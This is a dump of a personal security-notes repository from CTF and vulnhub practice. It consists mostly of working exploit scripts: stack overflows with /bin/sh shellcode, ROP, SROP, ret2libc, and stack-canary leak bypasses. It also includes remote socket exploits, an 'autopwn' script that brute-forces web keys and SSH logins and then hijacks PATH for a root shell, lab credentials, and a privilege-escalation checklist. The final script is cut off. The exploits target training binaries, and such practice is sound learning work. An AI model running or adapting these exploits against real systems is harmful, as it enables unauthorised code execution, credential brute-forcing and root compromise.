├── binary
    └── linux
    │   ├── x64
    │       ├── canary
    │       │   ├── README.md
    │       │   ├── vuln
    │       │   └── exploit.py
    │       ├── garbage
    │       │   ├── garbage
    │       │   └── exploit.py
    │       ├── bitterman
    │       │   ├── bitterman
    │       │   └── exploit.py
    │       ├── small_boi
    │       │   ├── small_boi
    │       │   └── exploit.py
    │       ├── simplerop
    │       │   ├── source.c
    │       │   └── exploit.py
    │       └── defeat_stack_cookies
    │       │   └── exploit.py
    │   └── x86
    │       ├── jigsaw
    │           ├── game3
    │           └── exploit.py
    │       ├── fusion
    │           ├── README.md
    │           ├── level01
    │           │   └── exploit.py
    │           └── level00
    │           │   └── exploit.py
    │       ├── ropprimer
    │           ├── creds.txt
    │           └── level0
    │           │   ├── level0
    │           │   └── exploit.py
    │       ├── ssp_bypass
    │           ├── README.md
    │           └── exploit.py
    │       └── jail
    │           ├── exploit.py
    │           └── jail.c
├── README.md
├── autopwn
    ├── sixes
    │   ├── sixes.jpeg
    │   ├── README.md
    │   └── autopwn.py
    └── nullbyte
    │   ├── nullbyte.jpg
    │   ├── README.md
    │   └── autopwn.py
├── cheatsheet
    └── binary
    │   ├── binary_exploitation.pdf
    │   └── README.md
└── misc
    └── privesc
        └── README.md


/binary/linux/x64/canary/README.md:
--------------------------------------------------------------------------------
1 | # thanks to OxSNAFU
2 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # securitynotes
2 | 
3 | 
4 | Just a place where to put notes.
5 | 


--------------------------------------------------------------------------------
/autopwn/sixes/sixes.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stunn4/securitynotes/HEAD/autopwn/sixes/sixes.jpeg


--------------------------------------------------------------------------------
/binary/linux/x64/canary/vuln:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stunn4/securitynotes/HEAD/binary/linux/x64/canary/vuln


--------------------------------------------------------------------------------
/autopwn/nullbyte/nullbyte.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stunn4/securitynotes/HEAD/autopwn/nullbyte/nullbyte.jpg


--------------------------------------------------------------------------------
/binary/linux/x86/jigsaw/game3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stunn4/securitynotes/HEAD/binary/linux/x86/jigsaw/game3


--------------------------------------------------------------------------------
/binary/linux/x64/garbage/garbage:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stunn4/securitynotes/HEAD/binary/linux/x64/garbage/garbage


--------------------------------------------------------------------------------
/binary/linux/x86/fusion/README.md:
--------------------------------------------------------------------------------
1 | # Fusion Exercises
2 | 
3 | [Fusion](https://exploit-exercises.lains.space/fusion/)
4 | 


--------------------------------------------------------------------------------
/binary/linux/x64/bitterman/bitterman:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stunn4/securitynotes/HEAD/binary/linux/x64/bitterman/bitterman


--------------------------------------------------------------------------------
/binary/linux/x64/small_boi/small_boi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stunn4/securitynotes/HEAD/binary/linux/x64/small_boi/small_boi


--------------------------------------------------------------------------------
/binary/linux/x86/ropprimer/creds.txt:
--------------------------------------------------------------------------------
1 | Username: root
2 | Password: toor
3 | 
4 | Username: level0
5 | Password: warmup
6 | 
7 | 


--------------------------------------------------------------------------------
/binary/linux/x86/ropprimer/level0/level0:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stunn4/securitynotes/HEAD/binary/linux/x86/ropprimer/level0/level0


--------------------------------------------------------------------------------
/cheatsheet/binary/binary_exploitation.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/stunn4/securitynotes/HEAD/cheatsheet/binary/binary_exploitation.pdf


--------------------------------------------------------------------------------
/binary/linux/x86/ssp_bypass/README.md:
--------------------------------------------------------------------------------
1 | # cookies bypass
2 | 
3 | Read <https://github.com/AndyCyberSec/binary_exploitation/tree/master/linux/stack_cookie_bypass>
4 | 
5 | Thanks to OxSNAFU!
6 | 


--------------------------------------------------------------------------------
/binary/linux/x64/simplerop/source.c:
--------------------------------------------------------------------------------
1 | //gcc -o vuln source.c -fno-stack-protector  -no-pie
2 | int main(){
3 |     char local_20[32];
4 |     puts("Simple ROP.\n");
5 |     gets(local_20);
6 |     return 0;
7 | }
8 | 


--------------------------------------------------------------------------------
/autopwn/nullbyte/README.md:
--------------------------------------------------------------------------------
1 | # nullbyte
2 | 
3 | I liked to play this box on vulnhub w/[@giovii](https://github.com/giovii)
4 | 
5 | ![autopwn running](https://raw.githubusercontent.com/stunn4/securitynotes/master/autopwn/nullbyte/nullbyte.jpg)
6 | 


--------------------------------------------------------------------------------
/autopwn/sixes/README.md:
--------------------------------------------------------------------------------
1 | # SiXeS 1
2 | 
3 | *I really enjoyed playing [SiXeS 1](https://www.vulnhub.com/entry/sixes-1,380/) so I thought to write an autopwn.*
4 | 
5 | ![autopwn running](https://raw.githubusercontent.com/stunn4/securitynotes/master/autopwn/sixes/sixes.jpeg)
6 | 


--------------------------------------------------------------------------------
/cheatsheet/binary/README.md:
--------------------------------------------------------------------------------
1 | # Binary exploitation
2 | *I really enjoy binary exploitation challenges: that's a real difficult topic and I thought to write a cheatsheet to avoid escaping ideas.*  
3 | *If I wrote some bullshit please ping me on telegram and I will improve my notes. (@stunn4)*
4 | 


--------------------------------------------------------------------------------
/binary/linux/x86/fusion/level01/exploit.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | 
 4 | import socket
 5 | import struct
 6 | import telnetlib
 7 | import sys
 8 | 
 9 | 
10 | if len(sys.argv) != 3:
11 | 	print "Usage: {} <rhost> <rport>".format(sys.argv[0])
12 | 	sys.exit()
13 | 
14 | print "[+] trying exploit against {}:{}".format(sys.argv[1],sys.argv[2])
15 | 
16 | # 21 bytes
17 | shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
18 | 
19 | jmp_esp = struct.pack("<I", 0x08049f4f)
20 | 
21 | s = socket.socket()
22 | s.connect((sys.argv[1], int(sys.argv[2])))
23 | 
24 | 
25 | # 21 bytes
26 | shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
27 | 
28 | buf = "A" * (139)
29 | buf += jmp_esp
30 | buf += "\x90" * 30
31 | buf += shellcode
32 | 
33 | 
34 | print "[+] payload crafted!"
35 | print "[+] sending {} bytes...".format(str(len(buf)))
36 | 
37 | request = """GET /{} HTTP/1.1\n""".format(buf)
38 | s.send(request)
39 | 
40 | print "[+] getting shell...\n"
41 | shell = telnetlib.Telnet()
42 | shell.sock = s
43 | shell.interact()
44 | 
45 | 
46 | print "[-] exploit failed!"
47 | 
48 | """
49 | [+] trying exploit against 192.168.1.229:20001
50 | [+] payload crafted!
51 | [+] sending 194 bytes...
52 | [+] getting shell...
53 | 
54 | id
55 | uid=20001 gid=20001 groups=20001
56 | """


--------------------------------------------------------------------------------
/binary/linux/x64/small_boi/exploit.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | 
 3 | # thanks https://bananamafia.dev/post/srop/
 4 | 
 5 | """
 6 | 
 7 | SROP is one of the ROP variants.
 8 | 
 9 | S is Sigreturn and is a technique that will force the overwrite of sigcontext.
10 | 
11 | Read the above link to better information.
12 | 
13 | 
14 | Constraints:
15 |     - syscall gadget
16 |     - the way to set our eax/rax to 0xf (that is the syscall number of sigreturn()).
17 |         check filippo.io
18 |         15	rt_sigreturn	stub_rt_sigreturn	arch/x86/kernel/signal.c
19 | 
20 | So:
21 |     - trigger your bof
22 |     - change rax to contain 0xf and do syscall
23 |     - then append your sigcontext that will contain: your arbitrary syscall (+parameters in registers) and RIP will contain the syscall gadget to trigger our exploit.
24 | 
25 | In this example we can trigger srop to get /bin/sh.
26 | 1. we will not force a leak to get /bin/sh since we find it in our program to exploit (addresses not randomized)
27 | 2. we will find gadget to put 0xf in rax and 'syscall' gadget.
28 | 3. we will craft our frame to call the syscall (execve in this case, but it may change according to the scenario).
29 | 
30 | 
31 | """
32 | 
33 | from pwn import *
34 | 
35 | context.arch = "amd64"
36 | 
37 | junk = b"A" * 40
38 | 
39 | mov_eax_gadget = p64(0x400180) # mov eax, 0xf; syscall;
40 | 
41 | 
42 | 
43 | frame = SigreturnFrame()
44 | frame.rax = (0x3b) # execve()
45 | frame.rdi = (0x4001ca) # /bin/sh
46 | frame.rip = (0x400185) # syscall gadget
47 | 
48 | 
49 | io = process("./small_boi")
50 | 
51 | io.send(junk + mov_eax_gadget + bytes(frame))
52 | 
53 | io.interactive()
54 | 


--------------------------------------------------------------------------------
/binary/linux/x86/ssp_bypass/exploit.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | """
 4 | 
 5 | Canary                        : Yes
 6 | NX                            : Yes
 7 | PIE                           : No
 8 | Fortify                       : No
 9 | RelRO                         : No
10 | 
11 | 0x08049000  _init
12 | 0x08049030  setbuf@plt
13 | 0x08049040  read@plt
14 | 0x08049050  printf@plt
15 | 0x08049060  __stack_chk_fail@plt
16 | 0x08049070  puts@plt
17 | 0x08049080  system@plt
18 | 0x08049090  __libc_start_main@plt
19 | 0x080490a0  setuid@plt
20 | 0x080490b0  _start
21 | 0x080490f0  _dl_relocate_static_pie
22 | 0x08049100  __x86.get_pc_thunk.bx
23 | 0x08049110  deregister_tm_clones
24 | 0x08049150  register_tm_clones
25 | 0x08049190  __do_global_dtors_aux
26 | 0x080491c0  frame_dummy
27 | 0x080491c2  pwn
28 | 0x08049215  begin
29 | 0x0804928b  FaiCose
30 | 0x080492f7  main
31 | 0x08049360  __libc_csu_init
32 | 0x080493c0  __libc_csu_fini
33 | 0x080493c1  __x86.get_pc_thunk.bp
34 | 0x080493d0  __stack_chk_fail_local
35 | 0x080493e4  _fini
36 | 
37 | 
38 | 
39 | """
40 | 
41 | 
42 | from pwn import *
43 | 
44 | junk = "A" * 100 # send newline too, so printf will continue
45 |                  # to get chars to print and will print
46 |                  # the canary cookie value!
47 | 
48 | p = process("./ssp_bypass")
49 | 
50 | # First stage: canary stack leakage
51 | 
52 | p.recv()
53 | p.sendline(junk)
54 | 
55 | p.recvuntil(junk)
56 | 
57 | leaked_cookie = u32(p.recv(4))
58 | cookie = leaked_cookie - 0xa
59 | 
60 | log.info("leaked cookie: {}".format(hex(leaked_cookie)))
61 | log.success("cookie: {}".format(hex(cookie)))
62 | 
63 | # Second stage: calling pwn() to get shell
64 | 
65 | pwnfu = p32(0x080491c2)
66 | cookie = p32(cookie)
67 | payload = junk + cookie + ("B" * 12) + pwnfu
68 |  
69 | 
70 | p.recv()
71 | p.sendline(payload)
72 | p.clean()
73 | 
74 | 
75 | p.interactive()
76 | 


--------------------------------------------------------------------------------
/binary/linux/x86/jail/exploit.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | """
 4 | 
 5 | Canary                        : No
 6 | NX                            : No
 7 | PIE                           : No
 8 | Fortify                       : No
 9 | RelRO                         : Partial
10 | 
11 | 
12 | this is an example from remote service:
13 | 
14 | 	OK Ready. Send USER command.
15 | 	DEBUG
16 | 	OK DEBUG mode on.
17 | 	USER admin
18 | 	OK Send PASS command.
19 | 	PASS 1974jailbreak!
20 | 	Debug: userpass buffer @ 0xffffd610
21 | 	OK Authentication success. Send command.
22 | 
23 | 
24 | 
25 | """
26 | 
27 | import socket
28 | import struct
29 | import telnetlib
30 | 
31 | def p32(address):
32 | 	return struct.pack("<I", address)
33 | 
34 | def interact(s):
35 | 	print "trying to interact..."
36 |         shell = telnetlib.Telnet()
37 | 	shell.sock = s
38 | 	shell.interact()
39 | 
40 | def exploit(payload):
41 | 	s = socket.socket()
42 | 	s.connect((HOST, PORT))
43 | 	s.recv(1024)
44 | 	s.send("DEBUG\n")
45 | 	s.recv(1024)
46 | 	s.send("USER admin\n")
47 | 	s.recv(1024)
48 | 	s.send("PASS " + (payload) + "\n")
49 | 	response = s.recv(1024)
50 | 	interact(s)
51 | 	s.close()
52 | 
53 | HOST = "10.10.10.34"
54 | PORT = 7411
55 | 
56 | username = "admin"
57 | password = "1974jailbreak!" 
58 | 
59 | # https://www.exploit-db.com/exploits/34060
60 | 
61 | shellcode = b""
62 | shellcode += b"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6"
63 | shellcode += b"\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80"
64 | shellcode += b"\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6"
65 | shellcode += b"\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
66 | shellcode += b"\x89\xe3\x31\xc9\xcd\x80"
67 | 
68 | 
69 | offset = 28
70 | junk = "A" * offset
71 | nop = "\x90" * 32
72 | 
73 | leak = (0xffffd610 + 32)
74 | payload = junk + p32(leak)  + nop + shellcode
75 | 
76 | print "jumping to {}...".format(hex((leak)))
77 | print "trying to trigger the exploit..."
78 | try:
79 |     exploit(payload)
80 | except:
81 | 	pass
82 | print "exploit failed..."
83 | 
84 | 


--------------------------------------------------------------------------------
/misc/privesc/README.md:
--------------------------------------------------------------------------------
 1 | # Privilege Escalation Checklist
 2 | 
 3 | *keep in mind that these notes are intended to provide a little and really basic checklist that I could sometimes follow when I feel stuck on scenario(s) like CTFs.*
 4 | 
 5 | ----
 6 | ## What do I have in my hands?
 7 | 1. Analyze every single information you found until now such as hosts, services, webroot, credentials, users..
 8 | 
 9 | 
10 | ----
11 | ## Basically what should I try?
12 | 0. Have you a doubt? Use always Google to clarify and try to go always a bit more in depth
13 | 1. Check kernel/OS version and installed patches
14 | 2. Check user permissions
15 | 3. Check about services
16 | 4. Read all configuration files
17 | 5. Process monitoring
18 | 6. Read the version all programs that are installed
19 | 7. Sniffing?
20 | 8. Seek files and try to understand which can contain useful information and collect them
21 | 9. Keep notes of everything you find interesting and be curious.
22 | 
23 | > If you are playing a CTF you could think that are not active users: remember that they could be there and they could be active as fuck
24 | 
25 | ----
26 | ## Which resources could become useful?
27 | 0. Google is always the best resource to search up to date information to exploit
28 | 1. [Linenum](https://github.com/rebootuser/LinEnum) or [JAWS](https://github.com/411Hall/JAWS)
29 | 2. [Linux exploit suggester](https://github.com/mzet-/linux-exploit-suggester) or [Windows exploit suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester)
30 | 3. [PSPY](https://github.com/DominicBreuker/pspy) or procmon.sh
31 |     
32 |         #!/bin/bash
33 |         prev_proc=$(ps -eo command)
34 |         while true; do
35 |             current_proc=$(ps -eo command)
36 |             diff <(echo "$prev_proc") <(echo "$current_proc")
37 |             sleep 1
38 |             prev_proc=$current_proc
39 |         done
40 | 
41 | 4. [GTFOBINS](https://gtfobins.github.io/) or [LOLBAS](https://lolbas-project.github.io/)
42 | 5. [ippsec](https://ippsec.rocks/)?
43 | 
44 | > Keep in mind that these are just tools, so you have to use your mind and you have to execute each step manually: don't trust tools.
45 | 
46 | ----
47 | ## I feel stuck really stuck, what to do?
48 | 0. Keep a little pause and think about what you found until this moment
49 | 1. Repeat enumeration steps
50 | 2. Try to go more in depth
51 | 3. Try harder!
52 | 
53 | > We can learn everyday a new concept, nobody knows everything.
54 | > We will be always noobs!
55 | 


--------------------------------------------------------------------------------
/binary/linux/x86/jigsaw/exploit.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | 
 4 | """
 5 | 
 6 | To pwn /bin/game3 we need to exploit ret2libc technique since we got:
 7 | CANARY    : disabled
 8 | FORTIFY   : disabled
 9 | NX        : ENABLED
10 | PIE       : disabled
11 | RELRO     : Partial
12 | 
13 | and plt section contains unhelpful functions.
14 | 
15 | 
16 | You need to start by finding the libc_base_address from ldd on the
17 | remote server: 
18 | 
19 | jigsaw@jigsaw:~$ ldd /bin/game3
20 | 	linux-gate.so.1 =>  (0xb772d000)
21 | 	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7570000)
22 | 	/lib/ld-linux.so.2 (0xb772f000)
23 | 
24 | jigsaw@jigsaw:~$ ldd /bin/game3
25 | 	linux-gate.so.1 =>  (0xb775b000)
26 | 	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb759e000)
27 | 	/lib/ld-linux.so.2 (0xb775d000)
28 | 
29 | You can understand that there is ASLR since the addresses change at each loading.
30 | 
31 | We could use 0xb759e000 in our example.
32 | 
33 | The next step is to get your system address and your /bin/sh string to execute as parameter.
34 | To exit gracefully you can use this method to get exit() function too.
35 | 
36 | jigsaw@jigsaw:~$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
37 |    243: 0011b8a0    73 FUNC    GLOBAL DEFAULT   12 svcerr_systemerr@@GLIBC_2.0
38 |    620: 00040310    56 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE
39 |   1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
40 | 
41 | The address we need is 0x40310.
42 | 
43 | jigsaw@jigsaw:~$ strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin
44 |  162d4c /bin/sh
45 |  164790 /bin:/usr/bin
46 |  164ccd /bin/csh
47 |  166184 /etc/bindresvport.blacklist
48 | 
49 |  The address we need is 0x162d4c
50 | 
51 | 
52 | You have to add this addresses to the libc_base_address.
53 | 
54 | Since there is ASLR you need to run your exploit in loop.
55 | jigsaw@jigsaw:~$ for i in `seq 1 300`; do /bin/game3 `python exploit.py`; done
56 | 
57 | # id
58 | uid=1000(jigsaw) gid=1000(jigsaw) euid=0(root) groups=0(root),1000(jigsaw)
59 | 
60 | Resource: https://spz.io/2018/10/18/buffer-overflow-return-to-libc/
61 | 
62 | """
63 | 
64 | 
65 | import struct
66 | 
67 | def p32(address):
68 | 	return struct.pack("<I", address)
69 | 
70 | libc_addr = 0xb759e000
71 | libc_system_addr = 0x40310
72 | libc_sh_addr = 0x162d4c
73 | 
74 | 
75 | system_addr = p32(libc_addr + libc_system_addr)
76 | sh_addr = p32(libc_sh_addr + libc_addr)
77 | 
78 | buf = ""
79 | buf += "A" * 76
80 | buf += system_addr
81 | buf += "BBBB"
82 | buf += sh_addr
83 | 
84 | 
85 | print buf


--------------------------------------------------------------------------------
/binary/linux/x86/fusion/level00/exploit.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | """
 4 | 
 5 | Canary                        : No
 6 | NX                            : No
 7 | PIE                           : No
 8 | Fortify                       : No
 9 | RelRO                         : No
10 | 
11 | [debug] buffer is at 0xfff3ff58 :-) 
12 | 
13 | cat /proc/3585/maps
14 | 08048000-0804b000 r-xp 00000000 08:01 673557                             /root/Scrivania/binaries/fusion/level00/level00
15 | 0804b000-0804c000 rwxp 00002000 08:01 673557                             /root/Scrivania/binaries/fusion/level00/level00
16 | f7d98000-f7f6d000 r-xp 00000000 08:01 402141                             /usr/lib32/libc-2.29.so
17 | f7f6d000-f7f6f000 r-xp 001d4000 08:01 402141                             /usr/lib32/libc-2.29.so
18 | f7f6f000-f7f71000 rwxp 001d6000 08:01 402141                             /usr/lib32/libc-2.29.so
19 | f7f71000-f7f73000 rwxp 00000000 00:00 0 
20 | f7f92000-f7f94000 rwxp 00000000 00:00 0 
21 | f7f94000-f7f97000 r--p 00000000 00:00 0                                  [vvar]
22 | f7f97000-f7f98000 r-xp 00000000 00:00 0                                  [vdso]
23 | f7f98000-f7fbf000 r-xp 00000000 08:01 402137                             /usr/lib32/ld-2.29.so
24 | f7fc0000-f7fc1000 r-xp 00027000 08:01 402137                             /usr/lib32/ld-2.29.so
25 | f7fc1000-f7fc2000 rwxp 00028000 08:01 402137                             /usr/lib32/ld-2.29.so
26 | fff21000-fff42000 rwxp 00000000 00:00 0                                  [stack]
27 | 
28 | """
29 | 
30 | import socket
31 | import struct
32 | import telnetlib
33 | import sys
34 | 
35 | if len(sys.argv) != 3:
36 | 	print "Usage: {} <rhost> <rport>".format(sys.argv[0])
37 | 	sys.exit()
38 | 
39 | print "[+] trying exploit against {}:{}".format(sys.argv[1],sys.argv[2])
40 | 
41 | s = socket.socket()
42 | s.connect((sys.argv[1], int(sys.argv[2])))
43 | 
44 | start_buffer = int(s.recv(1024).split(" ")[-2], 16) + 160
45 | print "[+] getting the start buffer address: {}".format(hex(start_buffer))
46 | 
47 | # 21 bytes
48 | shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
49 | 
50 | buf = "A" * (139)
51 | buf += struct.pack("<I", start_buffer)
52 | buf += "\x90" * 30
53 | buf += shellcode
54 | 
55 | 
56 | print "[+] payload crafted!"
57 | print "[+] sending {} bytes...".format(str(len(buf)))
58 | 
59 | request = """GET /{} HTTP/1.1\n""".format(buf)
60 | s.send(request)
61 | 
62 | print "[+] getting shell...\n"
63 | shell = telnetlib.Telnet()
64 | shell.sock = s
65 | shell.interact()
66 | 
67 | 
68 | print "[-] exploit failed!"
69 | 
70 | """
71 | 
72 | [+] getting the start buffer address: 0xfff3fff8
73 | [+] payload crafted!
74 | [+] sending 194 bytes...
75 | [+] getting shell...
76 | 
77 | id
78 | uid=20000 gid=20000 groups=20000
79 | 
80 | """


--------------------------------------------------------------------------------
/autopwn/nullbyte/autopwn.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | 
  3 | import requests
  4 | import sys
  5 | import re
  6 | import paramiko
  7 | from base64 import b64decode
  8 | from pwn import *
  9 | 
 10 | context.log_level = "error"
 11 | 
 12 | def print_warning(message):
 13 |     context.log_level = "info"
 14 |     log.warning(message)
 15 |     context.log_level = "error"
 16 | 
 17 | def print_success(message):
 18 |     context.log_level = "info"
 19 |     log.success(message)
 20 |     context.log_level = "error"
 21 | 
 22 | if __name__ == '__main__':
 23 |     if len(sys.argv) != 2:
 24 |         print("Usage: %s <rhost>" % sys.argv[0])
 25 |         sys.exit()
 26 | 
 27 |     banner = """ _______        .__  .__    __________          __          
 28 |  \      \  __ __|  | |  |   \______   \___.__._/  |_  ____  
 29 |  /   |   \|  |  \  | |  |    |    |  _<   |  |\   __\/ __ \ 
 30 | /    |    \  |  /  |_|  |__  |    |   \\___  | |  | \  ___/ 
 31 | \____|__  /____/|____/____/  |______  // ____| |__|  \___  >
 32 |         \/                          \/ \/                \/ """
 33 | 
 34 |     print(banner)
 35 | 
 36 |     rhost = sys.argv[1]
 37 |     url = "http://" + rhost
 38 | 
 39 | 
 40 |     ### first step: download main.gif and parse hidden directory
 41 |     print_success("downloading main.gif and parsing hidden directory....")
 42 |     response = requests.get(url + "/main.gif")
 43 |     directory = response.text[20:31].strip()
 44 |     keyurl = url + "/" + directory + "/index.php"
 45 | 
 46 |     ### second step: bruteforce of key
 47 |     print_success(f"bruteforcing key at {keyurl}...")
 48 |     keys = ["random_key", "another_random_key", "test", "password", "elite"]
 49 |     for key in keys:
 50 |         response = requests.post(keyurl, data={"key": key})
 51 |         if not 'invalid key' in response.text:
 52 |             print_success("valid key found: {}".format(key))
 53 |             break
 54 | 
 55 |     filename = re.findall('action="(.*?)"', response.text)[0]
 56 |     name = re.findall('name="(.*?)"', response.text)[0]
 57 |     usersearchurl = url + "/" + directory + "/" + filename + "?" + name
 58 |     
 59 |     ### third step: username ssh bruteforce
 60 |     print_success("parsing usernames and trying credentials...")
 61 |     response = requests.get(usersearchurl)
 62 |     usernames = re.findall("EMP NAME : (.*?) <br>", response.text)
 63 |     passwords = ['random_password', 'omega']
 64 | 
 65 |     found = False
 66 | 
 67 |     for username in usernames:
 68 |         for password in passwords:
 69 |             print_warning("testing {} {}".format(username, password))
 70 |             try:
 71 |                 sshsession = ssh(host=rhost, user=username, password=password, port=777)
 72 |                 found = True
 73 |                 break
 74 |             except paramiko.ssh_exception.AuthenticationException as error:
 75 |                 pass
 76 |         if found:
 77 |             print_success("{} {}".format(username, password))
 78 |             break
 79 | 
 80 |     ### fourth step: abusing $PATH variable
 81 |     print_success("abusing $PATH variable...")
 82 |     print_success("executing os commands...")
 83 |     commands = ["whoami", "ls /var/www/backup"]
 84 |     shell = sshsession.process("sh")
 85 |     for command in commands:
 86 |         shell.sendline(command)
 87 |         output = shell.recvline().decode().strip()
 88 |         log.success(output)
 89 | 
 90 |     filename = output.split(" ")[1]
 91 |     
 92 | 
 93 |     shell.sendline("/bin/cp /bin/sh /var/www/backup/ps")
 94 | 
 95 |     
 96 |     rootsession = ssh(host=rhost, user=username, password=password, port=777)
 97 |     rootshell = rootsession.process("/bin/sh", env={"PATH": "/var/www/backup", "PS1": ""})
 98 |     rootshell.sendline("procwatch")
 99 |     rootshell.sendline("export PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games")
100 | 
101 |     print_success("popping shell...")
102 |     rootshell.interactive()
103 | 
104 | 
105 | 


--------------------------------------------------------------------------------
/binary/linux/x86/ropprimer/level0/exploit.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | 
  3 | """
  4 | 
  5 | This challenge is part of Rop Primer (https://www.vulnhub.com/entry/rop-primer-02,114/).
  6 | 
  7 | To exploit level0 you have to make executable the stack segment in order to inject your shellcode and read the flag.
  8 | 
  9 | So, there is no ASLR and we are into a x86 system:
 10 | 
 11 | uname -a
 12 |     Linux rop 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
 13 | 
 14 | cat /proc/sys/kernel/randomize_va_space
 15 | 	0
 16 | 
 17 | By starting the binary analysis we can see that there is NX protection only
 18 | 
 19 | gdb-peda$ checksec
 20 | CANARY    : disabled
 21 | FORTIFY   : disabled
 22 | NX        : ENABLED
 23 | PIE       : disabled
 24 | RELRO     : disabled
 25 | 
 26 | and we can trigger our overflow after sending 44 bytes of junk.
 27 | 
 28 | System() is not loaded:
 29 | gdb-peda$ p system
 30 |     No symbol table is loaded.  Use the "file" command.
 31 | 
 32 | but we can find mprotect():
 33 | 
 34 | gdb-peda$ p mprotect
 35 |     $1 = {<text variable, no debug info>} 0x80523e0 <mprotect>
 36 | 
 37 | By reading the manual we can understand the mprotect() behavior and the parameter that this function will accept.
 38 | 
 39 | SYNOPSIS
 40 |     #include <sys/mman.h>
 41 |     int mprotect(void *addr, size_t len, int prot);
 42 | 
 43 | DESCRIPTION
 44 |        mprotect() changes protection for the calling process's memory page(s) containing any part of the address range
 45 |        in the interval [addr, addr+len-1].  addr must be aligned to a page boundary.
 46 | 
 47 | So now we need to know the start of the memory address that we want to change the protection to rwx.
 48 | 
 49 | gdb-peda$ vmmap
 50 | 	Start      End        Perm	Name
 51 | 	0x08048000 0x080ca000 r-xp	/home/level0/level0
 52 | 	0x080ca000 0x080cb000 rw-p	/home/level0/level0
 53 | 	0x080cb000 0x080ef000 rw-p	[heap]
 54 | 	0xb7fff000 0xb8000000 r-xp	[vdso]
 55 | 	0xbffdf000 0xc0000000 rw-p	[stack]
 56 | 
 57 | now --> 0x080ca000 0x080cb000 rwxp	/home/level0/level0
 58 | 
 59 | After this first stage we have to inject our shellcode to execute that will be 
 60 | \x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80
 61 | from https://packetstormsecurity.com/files/147512/Linux-x86-execve-bin-sh-Shellcode.html
 62 | 
 63 | Also we have to call the read() function in order to read our shellcode from the stdin.
 64 | Let's get our ropgadget to call the function after making stack segment executable.
 65 | 
 66 | gdb-peda$ ropgadget 
 67 |     ret = 0x8048106
 68 |     addesp_4 = 0x804a278
 69 |     popret = 0x8048550
 70 |     pop2ret = 0x8048883
 71 | 	pop4ret = 0x8048881
 72 | 	pop3ret = 0x8048882 # we need this.
 73 | 
 74 | gdb-peda$ p read
 75 | 	$1 = {<text variable, no debug info>} 0x80517f0 <read>
 76 | 
 77 | man read
 78 |     ssize_t read(int fd, void *buf, size_t count);
 79 | 
 80 | level0@rop:~$ (python exploit.py ; python -c 'print "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80"' ; cat) | ./level0
 81 | 	[+] ROP tutorial level0
 82 | 	[+] What's your name? [+] Bet you can't ROP me, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
 83 | 	id
 84 | 	uid=1000(level0) gid=1000(level0) euid=1001(level1) groups=1001(level1),1000(level0)
 85 | 
 86 | """
 87 | 
 88 | import struct
 89 | 
 90 | 
 91 | def p32(address):
 92 | 	return struct.pack("<L", address)
 93 | 
 94 | 
 95 | 
 96 | mprotect = p32(0x80523e0)
 97 | read = p32(0x80517f0)
 98 | 
 99 | stack_start_address = p32(0x080ca000)
100 | buffer_length = p32(0x1000)
101 | stack_permission = p32(0x7) #rwx
102 | pop3ret = p32(0x8048882)
103 | 
104 | shellcode = "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80"
105 | 
106 | # First stage: stack executable
107 | ## junk + mprotect + pop3ret + stack_start_address + buffer_length + stack_permission
108 | 
109 | buf = ""
110 | buf += "A" * 44
111 | buf += mprotect
112 | buf += pop3ret
113 | buf += stack_start_address
114 | buf += buffer_length
115 | buf += stack_permission
116 | 
117 | # Second stage: read from stdin the shellcode
118 | 
119 | buf += read
120 | buf += stack_start_address
